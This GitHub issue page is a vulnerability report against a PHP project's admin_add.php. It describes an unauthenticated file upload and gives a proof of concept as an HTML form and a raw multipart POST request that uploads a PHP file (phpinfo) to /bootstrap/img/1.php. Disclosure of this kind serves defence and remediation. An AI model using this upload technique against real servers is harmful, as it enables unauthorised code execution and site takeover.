Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
version:1.0 No login required. POC: upload form
<html> <form method="post" action="http://127.0.0.1:8888/admin_add.php" enctype="multipart/form-data"> <td><input type="text" name="add" value="1" readOnly="true"></td> <td><input type="file" name="image"></td> <input type="submit" name="save" value="upload" class="btn btn-primary"> </form> </html>
or post data
POST /admin_add.php HTTP/1.1 Host: 127.0.0.1:8888 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:8888/1.html Content-Type: multipart/form-data; boundary=---------------------------1224355802559658660204724760 Content-Length: 453 Connection: close Cookie: PHPSESSID=70880fb8e6521683e23cd9479d86610c Upgrade-Insecure-Requests: 1 -----------------------------1224355802559658660204724760 Content-Disposition: form-data; name="add" 1 -----------------------------1224355802559658660204724760 Content-Disposition: form-data; name="image"; filename="1.php" Content-Type: text/php <?php phpinfo(); ?> -----------------------------1224355802559658660204724760 Content-Disposition: form-data; name="save" upload -----------------------------1224355802559658660204724760--
after you upload your'e file u will find it here /bootstrap/img/1.php
View source code admin_add.php suggest:Please check upload file. author:zionlab@dbappsecurity.com.cn
The text was updated successfully, but these errors were encountered:
No branches or pull requests
version:1.0
No login required.
POC:
upload form
or post data
after you upload your'e file u will find it here /bootstrap/img/1.php
View source code admin_add.php
suggest:Please check upload file.
author:zionlab@dbappsecurity.com.cn
The text was updated successfully, but these errors were encountered: